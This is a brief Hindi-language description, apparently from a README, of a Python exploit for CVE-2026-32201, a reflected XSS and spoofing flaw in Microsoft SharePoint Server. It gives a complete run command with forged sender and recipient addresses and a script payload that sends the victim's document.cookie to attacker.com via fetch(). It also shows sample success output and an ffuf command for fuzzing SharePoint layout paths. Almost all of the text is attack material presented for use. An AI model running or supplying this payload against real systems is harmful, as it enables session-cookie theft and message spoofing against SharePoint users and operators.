
Python एक्सप्लॉइट CVE-2026-32201 के लिए, जो Microsoft SharePoint Server में एक reflected XSS है, जो तैयार किए गए HTTP अनुरोधों के माध्यम से बिना प्रमाणीकरण के स्पूफिंग और डेटा संशोधन को सक्षम बनाता है।
CVE-2026-32201 के लिए Python एक्सप्लॉइट - Microsoft SharePoint Server में अनुचित इनपुट सत्यापन, जो अनप्रमाणित नेटवर्क स्पूफिंग की अनुमति देता है (C:L/I:L)।
python3 exploit.py https://sharepoint.target.com \
--recipient [email protected] \
--sender "[email protected]" \
--message "<script>fetch('http://attacker.com/?c='+document.cookie)</script>" \
--endpoint /_layouts/15/notify.aspx
आउटपुट उदाहरण:
[+] SharePoint detected.
[*] Sending spoofed request to https://target.com/_layouts/15/notify.aspx
[+] Status: 200
[+] Potential success: Check target logs/email for spoofed content.
ffuf -u https://target.com/FUZZ -w sharepoint-layouts.txt--message में JS जोड़ें